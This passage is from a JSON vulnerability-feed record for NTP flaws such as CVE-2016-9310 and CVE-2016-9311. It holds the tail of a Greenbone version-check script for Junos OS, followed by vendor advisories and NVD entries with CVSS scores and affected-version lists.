Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106754\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 08:24:49 +0200 (Thu, 13 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_cve_id(\"CVE-2016-9311\", \"CVE-2016-9310\", \"CVE-2015-7973\", \"CVE-2015-7979\", \"CVE-2016-7431\",\n\"CVE-2015-8158\", \"CVE-2016-7429\", \"CVE-2016-7427\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos Multiple NTP Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to multiple vulnerabilities in NTP.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP.org and FreeBSD have published security advisories for vulnerabilities\nresolved in ntpd which impact Junos OS.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.3X48, 14.1, 14.2, 15.1, 16.1 and 16.2\");\n\n script_tag(name:\"solution\", value:\"New builds of 
Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.3X48-D45\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D45\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R8-S3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1R8-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R7-S6\") < 0) &&\n (revcomp(a: version, b: \"14.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R7-S6\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F7\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R6\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R6\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D80\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D80\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if (revcomp(a: version, b: \"16.1R3-S3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: 
\"16.1R3-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"16.2R1-S3\") < 0) &&\n (revcomp(a: version, b: \"16.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.2R1-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. ", "modified": "2016-12-07T20:21:32", "published": "2016-12-07T20:21:32", "id": "FEDORA:012B26015E2A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: ntp-4.2.6p5-43.fc24", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. 
", "modified": "2016-12-08T03:53:53", "published": "2016-12-08T03:53:53", "id": "FEDORA:457C1608C014", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: ntp-4.2.6p5-43.fc25", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. ", "modified": "2016-12-08T03:20:50", "published": "2016-12-08T03:20:50", "id": "FEDORA:9160C605D560", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: ntp-4.2.6p5-43.fc23", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "**Issue Overview:**\n\nThe following security-related issues were resolved:\n\n[CVE-2016-7426 __](<https://access.redhat.com/security/cve/CVE-2016-7426>): Client rate limiting and server responses \n[CVE-2016-7429 __](<https://access.redhat.com/security/cve/CVE-2016-7429>): Attack on interface selection \n[CVE-2016-7433 __](<https://access.redhat.com/security/cve/CVE-2016-7433>): Broken initial sync calculations regression \n[CVE-2016-9310 __](<https://access.redhat.com/security/cve/CVE-2016-9310>): Mode 6 unauthenticated trap information disclosure and DDoS vector \n[CVE-2016-9311 __](<https://access.redhat.com/security/cve/CVE-2016-9311>): Null pointer dereference when trap service is 
enabled \n\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.6p5-43.33.amzn1.i686 \n ntp-4.2.6p5-43.33.amzn1.i686 \n ntp-debuginfo-4.2.6p5-43.33.amzn1.i686 \n \n noarch: \n ntp-perl-4.2.6p5-43.33.amzn1.noarch \n ntp-doc-4.2.6p5-43.33.amzn1.noarch \n \n src: \n ntp-4.2.6p5-43.33.amzn1.src \n \n x86_64: \n ntp-4.2.6p5-43.33.amzn1.x86_64 \n ntp-debuginfo-4.2.6p5-43.33.amzn1.x86_64 \n ntpdate-4.2.6p5-43.33.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-01-04T17:00:00", "published": "2017-01-04T17:00:00", "id": "ALAS-2017-781", "href": "https://alas.aws.amazon.com/ALAS-2017-781.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n* It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\n* A flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\n* A flaw was found in the way ntpd implemented the trap service. 
A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\n* A flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\n* A flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)", "modified": "2018-06-06T20:24:18", "published": "2017-02-06T08:59:03", "id": "RHSA-2017:0252", "href": "https://access.redhat.com/errata/RHSA-2017:0252", "type": "redhat", "title": "(RHSA-2017:0252) Moderate: ntp security update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:38:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0252\n\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n* It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\n* A flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. 
(CVE-2016-9310)\n\n* A flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\n* A flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\n* A flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/034304.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/034305.html\n\n**Affected packages:**\nntp\nntp-doc\nntp-perl\nntpdate\nsntp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0252.html", "edition": 4, "modified": "2017-02-06T12:22:53", "published": "2017-02-06T11:25:17", "href": "http://lists.centos.org/pipermail/centos-announce/2017-February/034304.html", "id": "CESA-2017:0252", "title": "ntp, ntpdate, sntp security update", "type": "centos", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "[4.2.6p5-25.0.1.el7_3.1]\n- Bump release to avoid ULN conflict with Oracle modified errata.\n[4.2.6p5-25.el7_3.1]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)", "edition": 4, 
"modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "ELSA-2017-0252", "href": "http://linux.oracle.com/errata/ELSA-2017-0252.html", "title": "ntp security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-10-22T17:08:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426"], "description": "[4.2.6p5-28.0.1]\n- Bump release to avoid ULN conflict with Oracle modified errata.\n[4.2.6p5-28]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)\n- add Spectracom TSYNC driver (#1491797)\n- fix initialization of system clock status (#1493452)\n- fix typos in ntpd man page (#1420453)\n- use SHA1 request key by default (#1442083)\n- use network-online target in ntpdate and sntp services (#1466947)\n[4.2.6p5-27]\n- fix CVE-2016-7429 patch to work correctly on multicast client (#1422944)\n[4.2.6p5-26]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)", "edition": 5, "modified": "2018-04-16T00:00:00", "published": "2018-04-16T00:00:00", "id": "ELSA-2018-0855", "href": "http://linux.oracle.com/errata/ELSA-2018-0855.html", "title": "ntp security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:10:50", "description": "NTP before 4.2.8p9 allows remote attackers to bypass the origin timestamp protection mechanism via an origin timestamp of zero. 
NOTE: this vulnerability exists because of a CVE-2015-8138 regression.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7431", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7431"], "modified": "2018-11-08T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7431", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7431", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", 
"userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7428", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7428"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7428", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "The read_mru_list function in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (crash) via a crafted mrulist query.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7434", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7434"], "modified": "2020-06-18T18:20:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8", "cpe:/a:ntp:ntp:4.2.7"], "id": "CVE-2016-7434", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7434", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7:p333:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p312:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p405:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p242:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p279:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p426:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p317:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p107:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p423:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p193:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p441:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p454:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p349:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p311:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p56:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p382:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p199:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p27:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p417:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p338:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p362:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p66:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p249:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p444:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p461:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p239:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p466:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p440:*:*:*:*:*:*", 
"cpe:2.3:a:ntp:ntp:4.2.7:p261:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p115:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p183:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p327:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p204:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p394:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p189:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p31:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p26:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "The broadcast mode replay prevention functionality in ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via a crafted broadcast mode packet.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7427", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7427"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7427", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7427", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": 
["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 does not properly perform the initial sync calculations, which allows remote attackers to unspecified impact via unknown vectors, related to a \"root distance that did not include the peer dispersion.\"", "edition": 5, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7433", "type": "cve", "cwe": ["CWE-682"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7433"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7433", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7433", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 changes the peer structure to the interface it receives the response from a source, which allows remote attackers to cause a denial of service (prevent communication with a source) 
by sending a response for a source to an interface the source does not use.", "edition": 5, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7429", "type": "cve", "cwe": ["CWE-18"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7429"], "modified": "2018-01-05T02:31:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7429", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7429", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "NTP before 4.2.8p9 rate limits responses received from the configured sources when rate limiting for all associations is enabled, which allows remote attackers to cause a denial of service (prevent responses from the sources) by sending responses with a spoofed source address.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
